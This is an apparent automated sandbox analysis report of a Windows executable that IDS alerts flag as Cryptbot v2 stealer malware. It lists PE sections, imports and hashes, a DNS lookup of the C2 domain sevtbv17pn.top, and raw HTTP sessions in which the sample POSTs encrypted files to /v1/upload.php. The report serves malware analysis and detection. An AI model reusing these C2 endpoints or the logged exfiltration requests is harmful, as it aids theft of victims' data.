IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4c5528	0x4c5600	3b279bf93d94ab22d0e28a73e7862ebd	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x4c7000	0x1da560	0x1da600	016a019e22381b9a78e4a677dfc29c25	False	0.027730257740447958	dBase III DBT, version number 0, next free block index 10, 1st item "\245\215E"	0.41917699946747966	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x6a2000	0xf484	0xf600	6dc914609215d0f0bd0c8235622e4bd1	False	0.25112741361788615	data	5.882752268254566	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x6b2000	0x210c	0x2200	992f32ca83fa100daaa498dcbf920a8e	False	0.32042738970588236	data	4.8026577249347095	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x6b5000	0xb74	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6b6000	0xb78	0xc00	97c698ca6b5b7a5c0fcdc583433c42b8	False	0.4029947916666667	data	4.998945017991226	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x6b7000	0x30	0x200	947565758601e59a9e2e145caaaaefe2	False	0.064453125	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x6b8000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x6b9000	0x6a34c	0x6a400	accad031cb3a2885317d96ea1731e4cc	False	0.11737132352941176	data	6.624873841003287	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptGenRandom, CryptReleaseContext
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetLastError, GetModuleHandleA, GetModuleHandleW, GetNativeSystemInfo, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetThreadLocale, HeapAlloc, HeapFree, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, MultiByteToWideChar, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WideCharToMultiByte, lstrlenA
msvcrt.dll	__getmainargs, __initenv, __mb_cur_max, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _assert, _cexit, _errno, _chsize, _exit, _filelengthi64, _fileno, _initterm, _iob, _lock, _onexit, _unlock, _wcsnicmp, abort, atoi, bsearch, calloc, exit, fclose, fflush, fgetpos, fopen, fputc, fread, free, freopen, fsetpos, fwrite, getc, islower, isspace, isupper, isxdigit, localeconv, malloc, mbstowcs, memcmp, memcpy, memmove, memset, mktime, localtime, difftime, _mkdir, perror, qsort, realloc, remove, setlocale, signal, strchr, strcmp, strerror, strlen, strncmp, strncpy, strtol, strtoul, tolower, ungetc, vfprintf, time, wcslen, wcstombs, _stat, _write, _utime, _open, _fileno, _close, _chmod

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-14T09:15:10.390655+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49730	80.66.81.78	80	TCP
2024-10-14T09:15:14.041830+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49731	80.66.81.78	80	TCP
2024-10-14T09:15:19.548678+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49734	80.66.81.78	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 09:15:09.687480927 CEST	49730	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:09.692404032 CEST	80	49730	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:09.692730904 CEST	49730	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:09.692928076 CEST	49730	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:09.692955971 CEST	49730	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:09.700366974 CEST	80	49730	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:09.700381041 CEST	80	49730	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:10.390429974 CEST	80	49730	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:10.390605927 CEST	80	49730	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:10.390655041 CEST	49730	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:10.390680075 CEST	49730	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:10.395538092 CEST	80	49730	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.983685017 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:13.988564014 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.988641977 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:13.988790989 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:13.988908052 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:13.993684053 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.993745089 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.993746996 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:13.993756056 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.993767023 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.993774891 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.993794918 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.993803978 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.993814945 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:13.993840933 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:13.993856907 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:13.994004011 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.994014025 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.994055033 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:13.998780012 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.998790979 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.998807907 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.998816013 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.998825073 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.998835087 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.998842001 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:13.998892069 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:13.998903036 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:13.998931885 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:14.041541100 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:14.041830063 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:14.093529940 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:14.093786955 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:14.145473003 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:14.145560980 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:14.197523117 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:14.197700977 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:14.249470949 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:14.249609947 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:14.297497034 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:14.483068943 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:14.946252108 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:14.946671009 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:14.946744919 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:14.949268103 CEST	49731	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:14.954034090 CEST	80	49731	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.204193115 CEST	49734	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:18.731466055 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.731569052 CEST	49734	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:18.731759071 CEST	49734	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:18.731818914 CEST	49734	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:18.736574888 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.736649036 CEST	49734	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:18.736726046 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.736735106 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.736782074 CEST	49734	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:18.736831903 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.736848116 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.736855984 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.736876011 CEST	49734	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:18.736903906 CEST	49734	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:18.739130020 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.739185095 CEST	49734	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:18.739192009 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.739202023 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.739236116 CEST	49734	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:18.739253998 CEST	49734	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:18.739259005 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.741589069 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.741604090 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.741672039 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.741681099 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.741714001 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.741728067 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:18.785413027 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:19.548369884 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:19.548441887 CEST	80	49734	80.66.81.78	192.168.2.4
Oct 14, 2024 09:15:19.548677921 CEST	49734	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:19.550153971 CEST	49734	80	192.168.2.4	80.66.81.78
Oct 14, 2024 09:15:19.555207968 CEST	80	49734	80.66.81.78	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 09:15:09.235893965 CEST	52739	53	192.168.2.4	1.1.1.1
Oct 14, 2024 09:15:09.681608915 CEST	53	52739	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 14, 2024 09:15:09.235893965 CEST	192.168.2.4	1.1.1.1	0x6e8f	Standard query (0)	sevtbv17pn.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 14, 2024 09:15:09.681608915 CEST	1.1.1.1	192.168.2.4	0x6e8f	No error (0)	sevtbv17pn.top		80.66.81.78	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sevtbv17pn.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	80.66.81.78	80	7432	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 09:15:09.692928076 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary70837388 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 411 Host: sevtbv17pn.top
Oct 14, 2024 09:15:09.692955971 CEST	411	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 37 30 38 33 37 33 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 6f 71 Data Ascii: ------Boundary70837388Content-Disposition: form-data; name="file"; filename="Moqofub.bin"Content-Type: application/octet-stream[*;%VWEY[_8=-F%rPUrX2G-bp?fL9cA-4]~S^[N%#4E}
Oct 14, 2024 09:15:10.390429974 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Mon, 14 Oct 2024 07:15:10 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	80.66.81.78	80	7432	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 09:15:13.988790989 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary12658505 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 89281 Host: sevtbv17pn.top
Oct 14, 2024 09:15:13.988908052 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 31 32 36 35 38 35 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 57 61 73 Data Ascii: ------Boundary12658505Content-Disposition: form-data; name="file"; filename="Wasefipad.bin"Content-Type: application/octet-streammm$cqNcQ*U0nbk541sFlNHGNX>{x^AMQ%f'+U_sD/~,`Ng
Oct 14, 2024 09:15:13.993746996 CEST	1236	OUT	Data Raw: 4d 24 5c 68 89 53 5d 12 ec f1 0e 12 a6 f2 6f 0c c7 86 db c6 23 a1 5b f7 57 db 92 15 4f c7 32 70 20 3a 2f c9 d8 e4 5a 70 b2 42 8f 55 e9 86 49 db 35 fd 05 ac 18 2c 93 13 91 b5 11 24 23 1c df b0 80 44 b5 33 02 c5 61 60 3b 12 13 b7 7e 63 14 67 4a 66 Data Ascii: M$\hS]o#[WO2p :/ZpBUI5,$#D3a`;~cgJfrh<_6)mVjlH#FFnQGMt#?wY(My'TkrP^0NST&U0%vA_A+vN'e!LN~~-\:=~8{m
Oct 14, 2024 09:15:13.993814945 CEST	9888	OUT	Data Raw: 27 f5 ca a3 77 84 f2 ef 62 09 55 3d be f6 51 24 97 b4 3e bb 0b b7 21 ee 03 e3 b5 d5 f9 5b 30 73 8d 83 19 ee 97 6a ec f1 0e c9 af 76 d1 ac cd 34 6a ff 5b 9b fe ec eb 87 11 49 55 ed 55 45 cb b8 1c b8 5d 87 cc 9a 54 09 7a 51 1a 48 4a 09 72 45 8c 59 Data Ascii: 'wbU=Q$>![0sjv4j[IUUE]TzQHJrEY2+FukG91C`MW/bK("=$G6:{>b"joxdNVr`8zGU( f_4okzm7XLTk-
Oct 14, 2024 09:15:13.993840933 CEST	2472	OUT	Data Raw: e0 ae c3 8b bd 70 89 a8 fc 4c f7 8a 2e a3 9a 13 e2 76 ef 8c d8 a5 fb 8d b4 65 82 87 5d 86 a4 25 ae 6e 15 5d 9b ad b8 b8 27 1e a4 ed 4b 19 5d 2b 2e cc 92 4d 07 b1 7d 3b ec 88 9e 32 e3 6b 98 ad 08 c2 4d 6f 9d d6 7d 01 52 88 19 a6 63 80 e2 73 04 83 Data Ascii: pL.ve]%n]'K]+.M};2kMo}Rcs6/W)W3ybs7~2t1TPx:j_-5.I2(Ku134}jN.lpU;t %t9qZ{&)2*dg3I[Fq(BG2[RPpneIO4w
Oct 14, 2024 09:15:13.993856907 CEST	2472	OUT	Data Raw: f0 5c 93 30 00 91 32 cc 55 d6 38 be 3c d1 f2 ac 4c 37 49 10 7c 6e e1 19 26 af 65 83 f4 07 3e 47 4d 1b 7f 75 f3 9d 1e 75 fc fa 40 e2 b1 c5 4d e9 7d d4 36 7c 21 b5 6c fd 19 f9 1a 28 be 6a 72 19 37 df 86 72 6a 13 23 41 7f 4a 42 e1 a1 2b 5b e0 e4 74 Data Ascii: \02U8<L7I\|n&e>GMuu@M}6\|!l(jr7rj#AJB+[tnS8>fl@[K+k,+!q&rF4wFHtaCv\|t9WK!t;[?(\Yj{PeU[@hhk3>=7m/%Dkz`?as%j
Oct 14, 2024 09:15:13.994055033 CEST	4944	OUT	Data Raw: 58 74 04 d1 04 33 b6 7f 4d 4d 4c 68 8e 8a b2 8f 8d 6f b8 5a fd 22 d2 40 4b cd 66 b3 43 39 1c 11 96 10 86 16 3f a2 7f fc 89 16 dc b9 e5 17 ec 19 68 8a ef 2a 2b cd 0f b2 1a b0 cf d8 ed 3b e3 95 8d 0d f2 37 83 f1 57 6e 0c eb a7 25 f8 e9 75 34 0c 2c Data Ascii: Xt3MMLhoZ"@KfC9?h*+;7Wn%u4,MH(8M%6H;v_nS(Mo,CZp)h3Y:@ C,F"Q`{h\QL;XA``Y.V=]HLW]#vn#:1[:
Oct 14, 2024 09:15:13.998842001 CEST	2472	OUT	Data Raw: f4 7c 04 9e db 01 a5 1a 37 02 79 ee 3f 6d 4c 3c 7e cf 51 41 12 fe e5 27 38 bd 72 36 45 70 d5 5e f5 1e c0 d9 ca 9a 6a c0 a4 7e 35 f5 13 2d cc eb 6d c3 7e 69 e4 11 35 e6 32 77 3b 42 f8 b4 41 4f d3 42 b2 13 aa 88 21 e0 9a 8c cd b9 af bf 76 67 3c c6 Data Ascii: \|7y?mL<~QA'8r6Ep^j~5-m~i52w;BAOB!vg<7` KKDc]),@7Zw;H-y=&Cg~>46@QMQgQSt#F42/c`s`@{o0,_cjkR!+
Oct 14, 2024 09:15:13.998903036 CEST	6180	OUT	Data Raw: 5c f6 9b 32 3f 5e 16 df c6 86 3b 76 84 52 94 ba 80 a4 df ea ed 21 1f dc ee 24 27 7b 47 e9 62 32 70 be df cf b3 6d 96 6d 26 1e 8b 24 44 2c cb 74 34 a8 6f a5 8a da e1 aa 50 6e 89 4f 5d d2 c5 e5 23 5b 08 ba 50 ed 48 d2 41 35 24 58 c7 60 59 52 5d bc Data Ascii: \2?^;vR!$'{Gb2pmm&$D,t4oPnO]#[PHA5$X`YR]c3c;$s5.FIXLS c6>"*(SPLX+ ,A0\|%j[MFr 9N[Q.yVJmitj-RELwNK9
Oct 14, 2024 09:15:13.998931885 CEST	1236	OUT	Data Raw: dc c4 02 77 5b 91 56 07 39 13 3b 24 26 65 6b 27 70 8e a7 81 15 b1 26 e2 d7 67 1d 30 6b 87 91 25 40 f3 66 45 47 86 75 dc d3 48 fb a6 cf 97 a9 84 1e ba b6 8f fb a8 73 e4 2d 08 47 7e 75 c1 5f f9 46 43 36 ec 44 dd 6c af 4c 07 22 0a aa cf 2f bf b0 e0 Data Ascii: w[V9;$&ek'p&g0k%@fEGuHs-G~u_FC6DlL"/?:Q@<OCQy'x4L:NZJk]'WMA0;n.BIs7q;;[T8i)W{S+@>M2)6LQ:i.)-e8b7
Oct 14, 2024 09:15:14.041830063 CEST	25956	OUT	Data Raw: a7 84 c5 63 03 dc d9 af 49 67 2f 78 47 7f 69 eb 73 9c f4 27 b2 43 1c c5 f5 50 8d a0 ff 25 e2 3f 7b 51 aa e9 7f b4 44 b1 dd 0d ae c0 38 22 98 99 9e 21 8e c7 76 ae 8f 85 44 ce 45 69 60 26 f5 58 0c 27 37 5c d3 07 ca bd 43 0d f2 65 64 3e 6f a3 cb 83 Data Ascii: cIg/xGis'CP%?{QD8"!vDEi`&X'7\Ced>omZQzc, <6h2'q0KUoRRLyC JLSK:%,tJCYIE1'son~jkGF&`
Oct 14, 2024 09:15:14.946252108 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Mon, 14 Oct 2024 07:15:14 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	80.66.81.78	80	7432	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 09:15:18.731759071 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary60576727 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 31924 Host: sevtbv17pn.top
Oct 14, 2024 09:15:18.731818914 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 30 35 37 36 37 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 61 67 Data Ascii: ------Boundary60576727Content-Disposition: form-data; name="file"; filename="Vagijoqu.bin"Content-Type: application/octet-stream39JYoX>zh/)$P7)U2Ei"o~^U@wGgs;\|Qd4'25%bK
Oct 14, 2024 09:15:18.736649036 CEST	1236	OUT	Data Raw: d0 07 d3 7b dc 1f f4 e5 fc 2a ee 37 c9 1f 8f ec f9 08 2b 2d b1 9a b2 ba 22 4f 6a ab 9c 37 b4 6a 0a c3 0b 73 b1 36 c3 85 34 c5 ca 86 af c1 02 22 cf 6d f4 0e 11 31 eb ec 80 fa 39 80 b7 22 d4 f1 7e 38 1f b1 d6 e5 89 6d c3 6a 07 08 9d 52 a9 5f fd 84 Data Ascii: {7+-"Oj7js64"m19"~8mjR_{7xDc<5j{z\P!i\|>i-/lcB;ERB?&t.p?8Jm#dn)+!&Uk}H>_\|u7+
Oct 14, 2024 09:15:18.736782074 CEST	4944	OUT	Data Raw: ec 6b 6d 84 5b 6b a6 02 4f e7 4b 8d 1b 19 9f d7 c9 cc e8 dc 76 96 c3 47 3c 90 98 8b 94 b5 e5 7f 0e 68 6c b4 67 04 f9 41 5e 87 85 7d e3 60 29 9f 28 9d b3 bd 9d 26 36 31 20 5d 25 1b 02 8c bb 0c 62 9d bd 47 37 73 26 12 8e c2 9f 95 3a 3c aa c3 e8 ba Data Ascii: km[kOKvG<hlgA^}`)(&61 ]%bG7s&:<\|'2+PgJ-4v`&r`CLG\|d<$0[lmZ&k9IKB="TGr:;&o(&.SdB$m#D8IZv\|
Oct 14, 2024 09:15:18.736876011 CEST	2472	OUT	Data Raw: 02 95 d4 60 c5 a6 0d 16 0e 08 63 e9 60 02 e2 43 96 07 42 e5 4e 1c ad 0e b3 99 f2 1b 05 a0 6e ce a7 12 87 73 c2 c8 9b 07 08 8f 15 2f 3a 13 7d 4c 6d 7a d0 74 9e 17 79 eb c3 4b 8a ad bd eb 22 88 2a a9 16 53 2e 7d ba fa 3e d3 7a c1 f2 20 22 58 75 23 Data Ascii: `c`CBNns/:}LmztyK"*S.}>z "Xu#4mVcevj; +G>`D[0B9x\|7]-j-kv#`p^EJ%I7(kU81QDS }psZ"oQ4%rtgi\]oFS07<:
Oct 14, 2024 09:15:18.736903906 CEST	4944	OUT	Data Raw: e1 df 7f 87 86 bf 3e 13 26 d8 81 b0 7c cc 22 f7 c9 97 9f a2 c0 bd 77 0f 51 f9 38 f2 1b 26 6e f7 e3 4b 43 b6 2e 62 77 7a 5f e6 83 ba 5c af b7 74 8a 68 f7 ca 8c 28 7d 95 d8 c0 32 f1 8a 84 5d a7 d9 9f c2 19 34 eb c8 21 38 6b 9a bb 5d 40 f2 9e 2c 26 Data Ascii: >&\|"wQ8&nKC.bwz_\th(}2]4!8k]@,&#2Kr>Wd%<h)c+[DN?PdAo8{nW8%!Burnd*{53B;=RTry,beG=a@[K^z6fwYo0nuU~
Oct 14, 2024 09:15:18.739185095 CEST	2472	OUT	Data Raw: 12 0c c7 f5 3a 2f 65 31 e5 34 97 a3 b4 b4 21 66 cc fe d4 46 24 79 eb 7f c5 47 08 7e e6 bf a5 1a 02 5b 02 62 e3 3a 3a 72 84 49 54 65 bf 03 5f 96 bf d8 87 4e 8b 1a c4 77 a5 52 61 66 94 1f 27 05 07 42 7e 54 ea ca 94 6e 81 c0 33 a6 40 b1 02 7b 94 69 Data Ascii: :/e14!fF$yG~[b::rITe_NwRaf'B~Tn3@{ifWlv!ZiQVsY6Ng4C@gu@/C@Gimb)%>Q=&zN>)YOe6s@wq?z-N2w~S1o
Oct 14, 2024 09:15:18.739236116 CEST	2472	OUT	Data Raw: 75 9f f7 44 db 69 0a af b7 91 fd 8e f7 4c ec 65 72 51 7b 5b 0c e0 81 a1 14 2f 1b 85 f0 0f b0 75 2b 54 8e 50 54 b4 75 13 9d f8 b2 4f 21 d4 69 c7 9c f9 ba 8d 06 25 dc 8c a3 df 5f c1 5d 60 4e 9e 34 d5 bf d6 32 b2 ce 55 dd fa f4 7a 63 5a 1f fd 73 95 Data Ascii: uDiLerQ{[/u+TPTuO!i%_]`N42UzcZsf@E\|mpF1= Ww4F*XpY??],t-jsApe?3R1V:EIHY-^n,Hg@W%2>@7aCKP
Oct 14, 2024 09:15:18.739253998 CEST	2260	OUT	Data Raw: be 46 ad 2f 66 d9 8f c3 ca f5 af af 57 ae 20 d5 19 34 e4 0f 21 5c 3a 5f d3 1d 44 ce 17 e7 b6 47 58 63 26 dc d0 c8 d6 20 5b 89 56 ad ca 11 63 6b 1f e4 3e 64 45 1c 4a 28 ff d4 df 83 a1 f5 76 bf fd 24 63 fd 93 32 aa 32 40 ca 8f 2e 8a 5c 8e 57 f7 e9 Data Ascii: F/fW 4!\:_DGXc& [Vck>dEJ(v$c22@.\Wj(rM"BS6pkOwur=~0ph>HUg#S@wv&LMi{N n:l5VZpz+_j9.q%c
Oct 14, 2024 09:15:19.548369884 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Mon, 14 Oct 2024 07:15:19 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Target ID:	0
Start time:	03:15:00
Start date:	14/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x420000
File size:	7'457'792 bytes
MD5 hash:	7105A2BA8C897B6C2072A6AB0BDECDF1
Has elevated privileges:	true
Has administrator privileges:	true
